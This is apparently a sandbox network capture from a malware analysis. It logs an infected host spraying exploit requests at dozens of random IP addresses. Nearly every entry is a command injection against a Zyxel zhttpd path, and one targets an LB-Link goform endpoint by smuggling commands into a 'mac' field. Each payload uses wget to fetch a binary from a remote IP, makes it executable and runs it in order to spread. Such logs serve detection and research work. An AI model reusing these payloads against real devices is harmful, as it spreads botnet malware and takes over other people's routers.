                                                        Jan 28, 2024 10:13:07.704056978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8318192.168.2.145559483.134.217.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.704109907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8319192.168.2.1450704163.52.185.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.704147100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8320192.168.2.143448467.94.207.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.704159021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8321192.168.2.144112863.209.96.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.704216003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8322192.168.2.1448558196.39.160.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.704241991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8323192.168.2.1448280149.245.120.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:07.704288960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8324192.168.2.144040872.214.36.2138080
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.608681917 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                        Jan 28, 2024 10:13:08.743185997 CET509INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Sun, 28 Jan 2024 09:13:07 GMT
                                                        Server: lighttpd
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8325192.168.2.1440666115.124.216.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.710581064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8326192.168.2.144216636.205.19.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.710616112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8327192.168.2.1436428216.70.250.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.710647106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8328192.168.2.1439994199.14.129.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.710701942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8329192.168.2.145504259.74.94.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.710746050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8330192.168.2.144870698.99.192.131443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.710784912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8331192.168.2.143278845.229.53.131443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.710836887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8332192.168.2.145882695.255.209.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.710860968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8333192.168.2.1454044121.241.29.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.710917950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8334192.168.2.143836612.59.212.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.710925102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8335192.168.2.144113649.247.38.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.710968018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8336192.168.2.1433226135.112.219.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.711030006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8337192.168.2.144356874.135.235.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.711075068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8338192.168.2.145483846.172.211.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.711113930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8339192.168.2.1434252151.89.159.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.711159945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8340192.168.2.145942459.241.223.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.711190939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8341192.168.2.1456480144.2.200.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.711225033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8342192.168.2.1459324198.124.79.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.711245060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8343192.168.2.1434100210.76.183.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.711306095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8344192.168.2.145656692.63.232.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.711347103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8345192.168.2.1458696110.149.64.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.711396933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8346192.168.2.1451116143.107.213.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.711431026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8347192.168.2.1444614152.165.218.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.711473942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8348192.168.2.144620261.76.198.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.711502075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8349192.168.2.1442382167.248.14.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.711553097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8350192.168.2.145221442.38.170.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.711589098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8351192.168.2.1440574222.202.77.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.711635113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8352192.168.2.1443248152.222.180.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.711669922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8353192.168.2.1436068167.185.90.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.711699963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8354192.168.2.1441014167.248.205.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.711765051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8355192.168.2.1435078135.255.116.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.711792946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8356192.168.2.1460468101.155.57.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.711839914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8357192.168.2.1443518167.205.138.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.711884975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8358192.168.2.1446506128.99.237.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.711914062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8359192.168.2.1451204108.68.27.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.711945057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8360192.168.2.144186048.85.139.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.711990118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8361192.168.2.1438484194.34.157.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.712016106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8362192.168.2.144795238.2.163.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.712039948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8363192.168.2.144437842.190.83.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.712069035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8364192.168.2.145330073.214.243.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.712112904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8365192.168.2.1449688154.255.176.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.712156057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8366192.168.2.146056678.82.21.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.712186098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8367192.168.2.1454638113.137.60.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.712235928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8368192.168.2.1444964166.7.10.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.712300062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8369192.168.2.1455560163.1.14.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.712312937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8370192.168.2.1449106133.194.192.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.712342978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8371192.168.2.1447412198.224.15.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.712414980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8372192.168.2.144303018.242.216.96443
                                                        TimestampBytes transferredDirectionData
